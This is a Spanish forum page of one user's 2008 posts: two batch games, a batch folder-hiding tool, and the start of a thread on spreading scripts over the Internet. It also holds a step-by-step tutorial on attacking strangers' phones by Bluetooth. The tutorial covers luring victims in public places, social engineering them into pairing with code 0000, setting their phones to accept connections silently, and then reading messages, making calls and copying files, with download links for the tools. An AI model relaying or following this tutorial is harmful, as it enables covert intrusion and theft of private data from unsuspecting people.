elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: 1 2 [3] 4 5
21  Programación / Scripting / Snake en Batch o_O - by Smart en: 7 Septiembre 2008, 17:39 pm
Alguien por ahi me dijo que no se podia jugar en batch....  :rolleyes: :rolleyes:

Pues para esos que hablan mal de Batch...aqui tienen algo xD

Se trata de un Juego simple que creo que ya todos conocen: Snake....

Aunque por ahora no crece ni se alimenta, pero se mueve sola y se choca con las paredes.... ;D ;D

Esto es lo que llevo:  v1.

Código
  1. @echo off
  2. title Snake
  3. REM A Game like the Snake
  4. REM Coded by :: SmartGenius ::
  5. color 0a
  6. mode con cols=15 lines=16
  7.  
  8. :ini
  9. for /l %%a in (10,1,109) do (set p%%a= )
  10. set dot=Û
  11. set newpos=p10
  12. set %newpos%=%dot%
  13. set nnpos=p00
  14. set %nnpos%=.
  15.  
  16. :main
  17. cls
  18. set oldpos=%newpos%
  19. set curpos=%newpos%
  20. echo  ÚÄÄÄÄÄÄÄÄÄÄ¿
  21. echo  ³%p10%%p11%%p12%%p13%%p14%%p15%%p16%%p17%%p18%%p19%³
  22. echo  ³%p20%%p21%%p22%%p23%%p24%%p25%%p26%%p27%%p28%%p29%³
  23. echo  ³%p30%%p31%%p32%%p33%%p34%%p35%%p36%%p37%%p38%%p39%³
  24. echo  ³%p40%%p41%%p42%%p43%%p44%%p45%%p46%%p47%%p48%%p49%³
  25. echo  ³%p50%%p51%%p52%%p53%%p54%%p55%%p56%%p57%%p58%%p59%³
  26. echo  ³%p60%%p61%%p62%%p63%%p64%%p65%%p66%%p67%%p68%%p69%³
  27. echo  ³%p70%%p71%%p72%%p73%%p74%%p75%%p76%%p77%%p78%%p79%³
  28. echo  ³%p80%%p81%%p82%%p83%%p84%%p85%%p86%%p87%%p88%%p89%³
  29. echo  ³%p90%%p91%%p92%%p93%%p94%%p95%%p96%%p97%%p98%%p99%³
  30. echo  ³%p100%%p101%%p102%%p103%%p104%%p105%%p106%%p107%%p108%%p109%³
  31. echo  ÀÄÄÄÄÄÄÄÄÄÄÙ
  32. goto :%dir%
  33.  
  34. :w
  35. choice /c:wasdx /n /s /t:w,1
  36. if %errorlevel%==1 goto up
  37. if %errorlevel%==2 goto left
  38. if %errorlevel%==3 goto down
  39. if %errorlevel%==4 goto rigth
  40. if %errorlevel%==5 (goto out) else (goto main)
  41.  
  42. :a
  43. choice /c:wasdx /n /s /t:a,1
  44. if %errorlevel%==1 goto up
  45. if %errorlevel%==2 goto left
  46. if %errorlevel%==3 goto down
  47. if %errorlevel%==4 goto rigth
  48. if %errorlevel%==5 (goto out) else (goto main)
  49.  
  50. :s
  51. choice /c:wasdx /n /s /t:s,1
  52. if %errorlevel%==1 goto up
  53. if %errorlevel%==2 goto left
  54. if %errorlevel%==3 goto down
  55. if %errorlevel%==4 goto rigth
  56. if %errorlevel%==5 (goto out) else (goto main)
  57.  
  58. :d
  59. choice /c:wasdx /n /s /t:d,1
  60. if %errorlevel%==1 goto up
  61. if %errorlevel%==2 goto left
  62. if %errorlevel%==3 goto down
  63. if %errorlevel%==4 goto rigth
  64. if %errorlevel%==5 (goto out) else (goto main)
  65.  
  66. :down
  67. if %oldpos:~-2,1%==0 (goto :out)
  68. set newpos=%curpos%
  69. set %curpos%=
  70. set /a newpos=%newpos:~-2%+10
  71. set newpos=p%newpos%
  72. set %newpos%=%dot%
  73. goto main
  74.  
  75. :up
  76. if %oldpos:~-1,1%==1 (goto :out)
  77. set newpos=%curpos%
  78. set %curpos%=
  79. set /a newpos=%newpos:~-2%-10
  80. set newpos=p%newpos%
  81. set %newpos%=%dot%
  82. goto main
  83.  
  84. :rigth
  85. if %oldpos:~-1%==9 (goto :out)
  86. set newpos=%curpos%
  87. set %curpos%=
  88. set /a newpos=%newpos:~-2%+1
  89. set newpos=p%newpos%
  90. set %newpos%=%dot%
  91. goto main
  92.  
  93. :left
  94. if %oldpos:~-1%==0 (goto :out)
  95. set newpos=%curpos%
  96. set %curpos%=
  97. set /a newpos=%newpos:~-2%-1
  98. set newpos=p%newpos%
  99. set %newpos%=%dot%
  100. goto main
  101.  
  102. :out
  103. cls
  104. call :echodyn G A M E
  105. call :echodyn O V E R
  106. call :echodyn by Smart
  107. echo   SmartGenius
  108. echo   Corp. 2008
  109. pause>nul
  110.  
  111. :echodyn
  112. set texto=%* 
  113. set num=1
  114.  
  115. :dyn2
  116. call set var1=%%texto:~0,%num%%%
  117. if "%var1%"=="%texto%" set num=0
  118. cls
  119. echo    %var1%
  120. ping -n 0,3 0.0.0.0 > nul
  121. if %num%==0 (goto :eof)
  122. set /a num=%num%+1
  123. goto dyn2

Necesitan del comando CHOICE para que funcione... si no lo tienen pues en internet se consigue facilito... ;D

Algo que se me olvidaba, aunque creo que ya lo habian deducido es los Controles...

W = Arriba
A = Izquierda
S = Abajo
D = Derecha
X = Salir


Un segundo Codigo del Mismo, pero esta vez no se mueve en Reversa ni acelera...

Código
  1. @echo off
  2. title Snake
  3. REM A Game like the Snake
  4. REM Coded by :: SmartGenius ::
  5. color 0a
  6. mode con cols=15 lines=16
  7.  
  8. :ini
  9. for /l %%a in (10,1,109) do (set p%%a= )
  10. set dot=Û
  11. set newpos=p10
  12. set %newpos%=%dot%
  13. set nnpos=p00
  14. set %nnpos%=.
  15.  
  16. :main
  17. cls
  18. set oldpos=%newpos%
  19. set curpos=%newpos%
  20. echo  ÚÄÄÄÄÄÄÄÄÄÄ¿
  21. echo  ³%p10%%p11%%p12%%p13%%p14%%p15%%p16%%p17%%p18%%p19%³
  22. echo  ³%p20%%p21%%p22%%p23%%p24%%p25%%p26%%p27%%p28%%p29%³
  23. echo  ³%p30%%p31%%p32%%p33%%p34%%p35%%p36%%p37%%p38%%p39%³
  24. echo  ³%p40%%p41%%p42%%p43%%p44%%p45%%p46%%p47%%p48%%p49%³
  25. echo  ³%p50%%p51%%p52%%p53%%p54%%p55%%p56%%p57%%p58%%p59%³
  26. echo  ³%p60%%p61%%p62%%p63%%p64%%p65%%p66%%p67%%p68%%p69%³
  27. echo  ³%p70%%p71%%p72%%p73%%p74%%p75%%p76%%p77%%p78%%p79%³
  28. echo  ³%p80%%p81%%p82%%p83%%p84%%p85%%p86%%p87%%p88%%p89%³
  29. echo  ³%p90%%p91%%p92%%p93%%p94%%p95%%p96%%p97%%p98%%p99%³
  30. echo  ³%p100%%p101%%p102%%p103%%p104%%p105%%p106%%p107%%p108%%p109%³
  31. echo  ÀÄÄÄÄÄÄÄÄÄÄÙ
  32. goto :%dir%
  33.  
  34. :w
  35. choice /c:adxf /n /s /t:f,1
  36. if %errorlevel%==1 goto left
  37. if %errorlevel%==2 goto rigth
  38. if %errorlevel%==3 (goto out) else (goto up)
  39.  
  40. :a
  41. choice /c:wsxf /n /s /t:f,1
  42. if %errorlevel%==1 goto up
  43. if %errorlevel%==2 goto down
  44. if %errorlevel%==3 (goto out) else (goto left)
  45.  
  46. :s
  47. choice /c:adxf /n /s /t:f,1
  48. if %errorlevel%==1 goto left
  49. if %errorlevel%==2 goto rigth
  50. if %errorlevel%==3 (goto out) else (goto down)
  51.  
  52. :d
  53. choice /c:wsxf /n /s /t:f,1
  54. if %errorlevel%==1 goto up
  55. if %errorlevel%==2 goto down
  56. if %errorlevel%==3 (goto out) else (goto rigth)
  57.  
  58. :down
  59. if %oldpos:~-2,1%==0 (goto :out)
  60. set newpos=%curpos%
  61. set %curpos%=
  62. set /a newpos=%newpos:~-2%+10
  63. set newpos=p%newpos%
  64. set %newpos%=%dot%
  65. goto main
  66.  
  67. :up
  68. if %oldpos:~-1,1%==1 (goto :out)
  69. set newpos=%curpos%
  70. set %curpos%=
  71. set /a newpos=%newpos:~-2%-10
  72. set newpos=p%newpos%
  73. set %newpos%=%dot%
  74. goto main
  75.  
  76. :rigth
  77. if %oldpos:~-1%==9 (goto :out)
  78. set newpos=%curpos%
  79. set %curpos%=
  80. set /a newpos=%newpos:~-2%+1
  81. set newpos=p%newpos%
  82. set %newpos%=%dot%
  83. goto main
  84.  
  85. :left
  86. if %oldpos:~-1%==0 (goto :out)
  87. set newpos=%curpos%
  88. set %curpos%=
  89. set /a newpos=%newpos:~-2%-1
  90. set newpos=p%newpos%
  91. set %newpos%=%dot%
  92. goto main
  93.  
  94. :out
  95. cls
  96. call :echodyn G A M E
  97. call :echodyn O V E R
  98. call :echodyn by Smart
  99. echo   SmartGenius
  100. echo   Corp. 2008
  101. pause>nul
  102.  
  103. :echodyn
  104. set texto=%* 
  105. set num=1
  106.  
  107. :dyn2
  108. call set var1=%%texto:~0,%num%%%
  109. if "%var1%"=="%texto%" set num=0
  110. cls
  111. echo    %var1%
  112. ping -n 0,3 0.0.0.0 > nul
  113. if %num%==0 (goto :eof)
  114. set /a num=%num%+1
  115. goto dyn2
  116.  

Necesito ideas, y pues tambien codigo para arreglar algunos errores que tiene y para que haga las demas funciones que necesita para que sea igual al juego original...

Solo me falta hacer que crezca y se alimente.... ;D ;D y ya la tendria mas o menos lista...para Jugar  :D

Espero sus comentarios...

Saludos.
22  Programación / Scripting / Quien Quiere Ser Millonario ?? en: 2 Septiembre 2008, 21:11 pm
jeje, un jueguito simple, pero que puede ser extendido y hacerlo mas amplio y entretenido... ;D ;D

Código
  1. @echo off
  2. title Wants to be Millionarie ? - by Smart
  3. REM Simple Juego de Preguntas y Respuestas
  4. REM al estilo de Quien Quiere ser Millonario
  5. REM Coded by :: SmartGenius ::
  6. color 0a
  7. cls
  8. mode con cols=45 lines=20
  9. call :quests > quests.txt
  10. attrib +h quests.txt >nul
  11. set tot=0
  12. set q=0
  13.  
  14. :main
  15. cls
  16. call :rdn > nul
  17. if defined p%r% goto main
  18. set /a q=%q%+1
  19. for /f "tokens=1-7 delims=:" %%a in ('findstr /i /c:10%r% quests.txt') do (
  20. set cor=%%g
  21. echo      ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
  22. echo      º Quien Quiere Ser Millonario ?  º
  23. echo      ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
  24. echo  Pregunta Numero %q%   Puntos: %tot%
  25. echo  ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ   ÍÍÍÍÍÍÍÍÍÍÍÍ
  26. echo  %%b ?
  27. echo  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿
  28. echo  ³A³ ³ %%c³  ³B³ ³ %%d³
  29. echo  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ
  30. echo  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿
  31. echo  ³C³ ³ %%e³  ³D³ ³ %%f³
  32. echo  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ
  33. set /p opc="Respuesta > "
  34. set p%r%=X
  35. )
  36. if /i not %opc%==%cor% (call :fin)
  37. if %q%==5 (set /a tot=%tot%+50&call :fok) else (set /a tot=%tot%+50 &goto main)
  38.  
  39. :rdn
  40. set r=
  41. set /a rdn=((%random%*%random%)/%random%)+%random%
  42. set r=%rdn:~-1%
  43. goto :eof
  44.  
  45. :fin
  46. cls
  47. echo  Respuesta Incorrecta...
  48. echo  Has perdido el Juego
  49. echo  Total Acumulado: %tot%
  50. echo  Presiona Cualquier tecla
  51. echo  para Salir...
  52. pause>nul
  53.  
  54. :fok
  55. cls
  56. echo  Felicitaciones... lo has Superado.
  57. echo  Acumulaste un Total de %tot% puntos.
  58. echo  Presiona Cualquier tecla
  59. echo  para Salir...
  60. pause>nul
  61.  
  62. :quests
  63. echo 101:Cuantos Dedos tienes en la Mano :10        :8         :12        :20        :A:
  64. echo 102:Cuantos Ojos Tienes :8         :2         :6         :4         :B:
  65. echo 103:Cuantos Planetas hay en el Sistema Solar :10        :11        :9         :8         :C:
  66. echo 104:Cuantos Paises tiene Suramerica :15        :10        :20        :12        :D:
  67. echo 105:En que Planeta Vives :Marte     :Tierra    :Venus     :Pluton    :B:
  68. echo 106:Cual es el Foro Favorito de elhacker :Windows   :Programas :Hacking   :Software  :C:
  69. echo 107:En que Ano se Descubrio America :1492      :1450      :1500      :1512      :A:
  70. echo 108:Quien es el Autor de este Juego :Shadow    :Smart     :Arkangel  :carlitos  :B:
  71. echo 109:Quien es el Mas Conocido en el foro :SDC       :el-brujo  :Smart     :Otros     :D:
  72. echo 100:En que continente se encuentra Djibuti :Africa    :Asia      :Europa    :Antartida :A:
  73. goto :eof
  74.  

El juego te hace 5 preguntas y te va acumulando los puntos.... :D si te equivocas en una pierdes.....

No repite una pregunta en el mismo juego... pero su repertorio de preguntas no es muy extendido...solo es una base a ver que les parece...

Saludos.  ::)
23  Comunicaciones / Hacking Mobile / [TUTO] Como Hackear Telefonos por Bluetooth ¡¡ en: 16 Agosto 2008, 17:30 pm

Hoy enseñharemos el proceso de “hackeo de un celulares” a través de bluetooth, desde lo mas básico como enviarle un mensaje a su dispositivo, hasta operaciones mas avanzadas como el robo de información delicada y archivos del teléfono. También habrá un apartado sobre la seguridad y la forma de protegerse.


Para empezar, debemos tener claro los siguientes conceptos: BlueHacking, BlueSnarffing, BlueBugging, así que nos leeremos un post en donde esta explicado todo esto:

http://thesmartgenius.wordpress.com/2008/05/11/bluejacking-bluesnarfing-bluebugging-bluetoothing/

Una vez tenemos claros los conceptos, procedemos a hacer una lista de las cosas que necesitamos para estos ataques.

 

-         Un Móvil(celular) con soporte Bluetooth

-         Herramientas de BlueHacking, BlueSnarfing, BlueBugging *

-         Algo de creatividad, paciencia, e Ingeniería social.

Herramientas :

http://thesmartgenius.wordpress.com/2008/05/11/herramientas-bluehacking-bluesnarfing-etc/

Bien, empecemos con lo básico, el bluehacking




Para hacer esto necesitamos de una victima que tenga su teléfono funcionando, con el bluetooth prendido, en modo descubierto, y al alcance, así que sugeriría buscar lugares donde haya bastante concurrencia de gente como pueden ser Centro Comerciales, Cines y ese tipo de sitios…

 
La Técnica del Bluejacking es el envió de mensajes sin permiso, en este caso un contacto o Nota, así que empezaremos por crear en nuestro móvil un nuevo contacto, cuyo nombre será “Has sido BlueHackeado xD”, y una ves guardado, se dispondrá a buscar un dispositivo al alcance para mandárselo, y  a reír con la cara que pondrá la victima, ya que no sabrá de donde vino, y pensara que su móvil esta funcionando mal.

 
También es posible no solo mandando Contactos, sino también Notas, o eventos del calendario, y allí es donde entra a jugar tu imaginación con los mensajes que escribas… 



BlueBugging
 

La segunda forma de ataque es el BlueBugging, que se aprovecha de errores(bugs) en la autentificación del dispositivo bluetooth, o en su defecto por desconocimiento del usuario (victima) de la capacidad del bluetooth, lo que permite la ejecución de comandos AT en el Terminal, que permiten virtualmente controlar completamente un dispositivo.

 
Para esta técnica nos basaremos en una aplicación muy conocida por todos como lo es el BT Info (Super Bluetooth Hack)…

Link: http://rapidshare.com/files/114673088/SuperBluetoothHack1.08bySmartGenius.zip


Que básicamente lo que hace es aprovechar una conexión ya establecida a través del bluetooth, ya sea con el consentimiento de la victima o a través del engaño.


Hay dos maneras, que son con gente conocida y teniendo acceso al móvil, o haciéndolo en un lugar publico con una victima al azar…

 
Lo que tienes que hacer es abrir la aplicaron en tu celular, vas a la opción de conectar y le das en buscar dispositivos, en este momento puedes pedir prestado el móvil a la victima, diciéndole que le vas a pasar alguna imagen o algo así, entonces le prendes el bluetooth y aceptas la conexión entrante desde tu móvil, allí te preguntara que si deseas acoplar el dispositivo, aceptas e introduces un código de seguridad el cual debe ser 0000, Luego en tu móvil también te preguntara por el código e introduces el código anterior, y ya se ha realizado la conexión, así que la aplicación ya mostrara las opciones para control de celular las cuales se basan en los comando AT, y varían dependiendo del modelo de móvil que quieras controlar, cabe resaltar que la aplicación funciona perfectamente controlando otros móviles SonyEricsson, en menor medida a los Nokia, y mucho menos a los Motorola.

 
Tienes muchas opciones como revisarle los mensajes, copiar sus contactos, realizar llamadas, cambiarle el idioma, poner música y otras dependiendo del modelo de celular.


Un Consejo: cuando hayas hecho la primera conexión con el móvil, después de meter la clave y ver que la aplicación se conecto, debes de desconectarlo, y luego en el móvil de la victima debes de ir hasta la configuración del bluetooth, allí buscas la lista de dispositivos, seleccionas el que tiene tu nombre y entre las opciones que salen debes escoger que nunca pregunte o que siempre te de permiso sin avisar cundo quieras conectarte.


La otra forma es en un lugar público, en donde lo único que cambia es que no tiene acceso al móvil de la victima, por lo que tienes que recurrir a otras técnicas…


En este caso nos podremos en el nombre de nuestro dispositivo, algo sugestivo, que incite a que la persona acepte, ya sea que escribas “Servico al Cliente” o cosas por el estilo, y cuando ya tengas acceso podrás hacer con el móvil lo que quieras, claro dependiendo del móvil con el que te conectes.

 

BlueSnarfing


Esta técnica es un poco más avanzada, pero va de la mano con el bluebugging y en especial con el uso del Super Bluetooth Hack.

 
Con esta técnica básicamente lo que vamos a hacer es a “copiar” archivos que tenga el móvil victima, aunque sin su permiso, para esto hacemos uso de la aplicación BT File Manager…


Link: http://rapidshare.com/files/111529670/BT_File_ManagerES-bySmartGenius.zip

 
Que viene siendo una clase de cliente FTP a través del bluetooth, que aprovecha la conexión para ver todos los archivos que están en la memoria del móvil.

 
Si ya han usado el Super Bluetooth Hack no les será difícil conectarse con otro móvil ya que es de la misma manera, buscando primero un dispositivo, acoplándose con el e introduciendo un código de seguridad, pero si es a un móvil con el que ya se habían conectado antes con la otra aplicación y lo configuraron para que no pidiera permisos, lo mas probable es que la conexión no presente problemas y los deje entrar fácilmente.


La aplicación cuenta con dos opciones que son “Mi Dispositivo” y “Dispositivos Bluetooth”, pues obvio saben que es mi dispositivo, por medio del cual pueden acceder a su memoria y ver que archivos tienen; cabe resaltar que esta opción necesita que el teléfono tenga soporte JSR75 que es el que da acceso al sistema de archivos, por lo que puede que la aplicación pida permisos de lectura y escritura en su móvil, así que antes de entrar deben de darle en opciones, luego en permisos, y allí buscan los permisos de escritura y acceso a datos y los activan todos.

 
Una vez están los permisos configurados, procedemos a entrar a la aplicación, ir a la opción de “Dispositivos BT” y empezar a buscar un dispositivo con el cual conectarnos, cuando hemos realizado la conexión exitosamente, tendremos acceso a los archivos del otro móvil, y solo es cosa de seleccionar el que quieres y darle a copiar, o cortar, y luego en una carpeta de tu móvil le das pegar… es tan sencillo y muy parecido al manejo de archivos en Windows, así que no les será difícil este procedimiento.

 
Con el programa vienen todas las opciones de trabajo con archivos, como copiar, cortar, pegar, mover, renombrar o eliminar, así que solo es cuestión de ustedes decidir que hacer.


Citar
Nota: Algunos modelos de teléfonos, en especial los motorola, con cuentan con los certificados suficientes par hacer uso del bluetooth  a través de aplicaciones Java (JSR89) y también para el acceso al sistema de archivos (JSR75), por lo que puede que alguna de las aplicaciones de un error en algunos móviles.


Apartado sobre Seguridad

http://thesmartgenius.wordpress.com/2008/06/03/el-bluetooth-y-la-seguridad/

http://gospel.endorasoft.es/bluetooth/seguridad-bluetooth/index.html

Espero sea de su mas grande Utilidad…

Att. :: SmartGenius ::

Saludos 
24  Programación / Scripting / Virtual Drive v 1.5 by :: SmartGenius :: en: 16 Agosto 2008, 17:24 pm
Bueno, pensando en hacer una aplicacion que me permitiera proteger archivos en Windows pues pense en hacer una de Unidad Virtual pero que no fuese omo los demas...

Estuve un rato probando codigo hasta que encontre la forma de esconder los datos en una carpeta especial del sistema que solo es accesible desde MS-DOS o montando una unidad virtual, y pues en eso se basa el codigo...

El metodo lo he llamado "Credenciales" y es ideado por mi, y pues vean que ya es la version 1.5 con algunas mejoras como las gestion de varias unidades por cada usuario....

El codigo:

Código
  1. mode con cols=68
  2. mode con lines=25
  3.   @echo off
  4. title Virtual Drive - by :: SmartGenius ::
  5. color 0a
  6. REM Gestor de Unidad Virtual Protegida
  7. REM Proteccion Mediante Credenciales, metodo by SmartGenius
  8. REM Las Credenciales Permiten Crear una Unidad Virtual
  9. REM independiente para cada Usuario de la PC.
  10.  
  11. :load
  12. cls
  13. call :credencial
  14. if not exist "%homedrive%\RECYCLER\%cred%\config.cfg" (goto first) else (goto menu)
  15.  
  16. :menu
  17. cls
  18. echo  Token: %cred%
  19. echo       ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
  20. echo       º Gestor de Unidades Virtuales º
  21. echo       ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
  22. echo    Elija una Opcion:
  23. echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
  24. echo   ³1³ ³ Abrir Unidad Virtual  ³  ³2³ ³ Cerrar Unidad...     ³
  25. echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
  26. echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
  27. echo   ³3³ ³ Crear Unidad Nueva... ³  ³4³ ³ Eliminar Unidad...   ³
  28. echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
  29. echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
  30. echo   ³5³ ³ Proteger Unidad...    ³  ³6³ ³ Ayuda ^& Informacion  ³
  31. echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
  32. set /p pin=">> "
  33. if %pin%==1 call :gestion open
  34. if %pin%==2 call :gestion close
  35. if %pin%==3 call :create
  36. if %pin%==4 call :gestion delete
  37. if %pin%==5 call :gestion lock
  38. if %pin%==6 (goto help) else (goto menu)
  39.  
  40. :gestion
  41. cls
  42. set funcion=%1
  43. for /F "tokens=*" %%n in (%homedrive%\RECYCLER\%cred%\config.cfg) do (set num=%%n)
  44. call :unis %num%
  45. cls
  46. echo  Unidades Virtuales: %num%
  47. echo  Escoja una Unidad Virtual:
  48. echo  %lin11%   %lin12%   %lin13%
  49. echo  %uni1%   %uni2%   %uni3%
  50. echo  %lin21%   %lin22%   %lin23%
  51. set /p unidad=">> "
  52. call :%funcion% %unidad%
  53. goto :eof
  54.  
  55. :unis
  56. set num=%1
  57. set /a cont=%num%+1
  58. :unis2
  59. set /a cont=%cont%-1
  60. for /F "tokens=*" %%l in (%homedrive%\RECYCLER\%cred%\vd00%cont%.tmf) do (set drive=%%l)
  61. set drive=%drive: =:%
  62. set uni%cont%%cont%³ ³ Unidad %drive% ³
  63. set lin1%cont%=ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿
  64. set lin2%cont%=ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ
  65. if %cont%==0 (goto :eof) else (goto unis2)
  66.  
  67. :credencial
  68. for /R "%homepath%\Datos de programa\Microsoft\Credentials" %%i in (.) do (echo %%i>%temp%\cred.tmf)
  69. for /F "tokens=7 delims=\" %%n in (%temp%\cred.tmf) do (set cred=%%n)
  70. goto :eof
  71.  
  72. :first
  73. call :credencial
  74. cls
  75. echo  Token: %cred%
  76. echo  Aun no ha creado Ninguna Unidad Virtual
  77. echo  Desea Crear Una ?? Si [S]  No [N]
  78. set /p opc=">> "
  79. if %opc%==n (echo.&echo  Gracias por Usar el Software...&echo.&pause&exit)
  80. if %opc%==N (echo.&echo  Gracias por Usar el Software...&echo.&pause&exit)
  81. md "%homedrive%\RECYCLER\%cred%\VD001"
  82. echo 1 >%homedrive%\RECYCLER\%cred%\config.cfg
  83. echo Z >%homedrive%\RECYCLER\%cred%\vd001.tmf
  84. goto menu
  85.  
  86. :open
  87. set var=%1
  88. if not exist "%homedrive%\RECYCLER\%cred%\vd00%var%.tmf" (echo.&echo  La Unidad Escogida no Existe&echo.&pause&goto menu)
  89. for /F "tokens=*" %%m in (%homedrive%\RECYCLER\%cred%\vd00%var%.tmf) do (set drive=%%m)
  90. set drive=%drive: =:%
  91. if exist "%drive%" (echo.&echo  La Unidad se encuentra Activa&echo.&pause&start %drive%&goto menu)
  92. if exist "%homedrive%\RECYCLER\%cred%\vd00%var%\password.cfg" (call :unlock %var%)
  93. set ruta=%homedrive%\RECYCLER\%cred%\vd00%var%
  94. subst "%drive%" "%ruta%"
  95. ping -n 5 0.0.0.0>nul
  96. start %drive%
  97. goto :eof
  98.  
  99. :close
  100. set letra=%1
  101. for /F "tokens=*" %%m in (%homedrive%\RECYCLER\%cred%\vd00%letra%.tmf) do (set drive=%%m)
  102. set drive=%drive: =:%
  103. subst "%drive%" /D
  104. echo  Unidad Bloqueada
  105. goto :eof
  106.  
  107. :lock
  108. set virt=%1
  109. if exist "%homedrive%\RECYCLER\%cred%\vd00%virt%\password.cfg" (call :unlock %virt%)
  110. echo  Introduzca un Clave para Proteger la Unidad
  111. set /p clave=">> "
  112. echo %clave%>"%homedrive%\RECYCLER\%cred%\vd00%virt%\password.cfg"
  113. attrib +h "%homedrive%\RECYCLER\%cred%\vd00%virt%\password.cfg"
  114. echo  La Clave "%clave%" ha sido establecida Exitosamente.
  115. goto :eof
  116.  
  117. :unlock
  118. set tip=%1
  119. for /F "tokens=*" %%c in (%homedrive%\RECYCLER\%cred%\vd00%tip%\password.cfg) do (set word=%%c)
  120. echo  La Unidad Virtual se Encuentra Protegida.
  121. echo  Introduzca el Password:
  122. set /p pass=">> "
  123. if %pass%==%word% (goto :eof) else (echo.&echo  Clave Incorrecta&pause&goto menu)
  124. goto :eof
  125.  
  126. :help
  127. cls
  128. echo  Bienvenido a la Ayuda del Programa
  129. echo  La Primera vez que ejecuta la Utilidad, se crea la
  130. echo  Unidad Virtual en la que se guardaran los archivos.
  131. echo  El TOKEN es el Identificador de Seguridad del Usuario,
  132. echo  y es diferente en cada Instalacion de Windows.
  133. echo  Use la Unidad Virtual para guardar archivos y luego
  134. echo  bloquee el acceso mediante la aplicacion.
  135. echo  Puede crear un Maximo de 3 Unidades Virtuales por
  136. echo  usuario.
  137. echo  Si lo desea, puede establecer una contraseña para cada
  138. echo  na de las Unidades Virtuales.
  139. echo  Para dudas, comentarios y sugerencias favor contactar
  140. echo  con el autor del Programa.
  141. echo          :: SmartGenius, Corp. 2008 ::
  142. goto menu
  143.  
  144. :create
  145. cls
  146. echo  Token: %cred%
  147. echo  Desea Crear Una Nueva Unidad Virtual?? Si [S]  No [N]
  148. set /p opc=">> "
  149. if %opc%==n (goto menu)
  150. if %opc%==N (goto menu)
  151. for /F "tokens=*" %%d in (%homedrive%\RECYCLER\%cred%\config.cfg) do (set num=%%d)
  152. if %num%==3 (echo.&echo  No se permiten mas de 3 Unidades Virtuales&echo.&pause&goto menu)
  153. set /a num=%num%+1
  154. md "%homedrive%\RECYCLER\%cred%\vd00%num%"
  155. echo %num% >%homedrive%\RECYCLER\%cred%\config.cfg
  156. echo  Introduzca una Letra para Asignar a la Nueva Unidad:
  157. set /p new=">> "
  158. echo %new% >%homedrive%\RECYCLER\%cred%\vd00%num%.tmf
  159. echo  Unidad Virtual %new% creada.
  160. goto menu
  161.  
  162. :delete
  163. cls
  164. set borrar=%1
  165. echo  Token: %cred%
  166. echo  Esta Seguro de quitar la Unidad Virtual?? Si [S]  No [N]
  167. set /p opc=">> "
  168. if %opc%==n (goto menu)
  169. if %opc%==N (goto menu)
  170. for /F "tokens=*" %%d in (%homedrive%\RECYCLER\%cred%\config.cfg) do (set num=%%d)
  171. set /a num=%num%-1
  172. del /f "%homedrive%\RECYCLER\%cred%\vd00%num%.tmf"
  173. rd "%homedrive%\RECYCLER\%cred%\vd00%num%"
  174. echo %num% >%homedrive%\RECYCLER\%cred%\config.cfg
  175. echo  Unidad Virtual Eliminada.
  176. goto menu
  177.  

La credencial es le Identificador de Usuario de WINDOWS, es diferente por cada usuario sea Normal, Invitado o Administrador por lo que varia su longitud de caracteres, y ademas tambien es diferente por cada Instalaciond e WINDOWS, la verdad que fue un gran logro y en eso se basa la proteccion..

Intenten guardar datos y luego cerrrar la unidad, despues de eso los buscan desde WINDOWS y no los encontrara, solo mientras la unidad este montada...

Se puede proteger la unidad, y crear otras dos mas para un total de 3 por usuario, pero no creo que se necesite mas de una...

Acepto sugerencias y ayuda, o comentarios...

Saludos.
25  Programación / Scripting / [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? en: 20 Julio 2008, 20:04 pm
Tenemos como base el siguiente codigo...

http://two.xthost.info/smartgenius/codigo.txt

Archivo BAT de Prueba
Código:
mode con cols=60
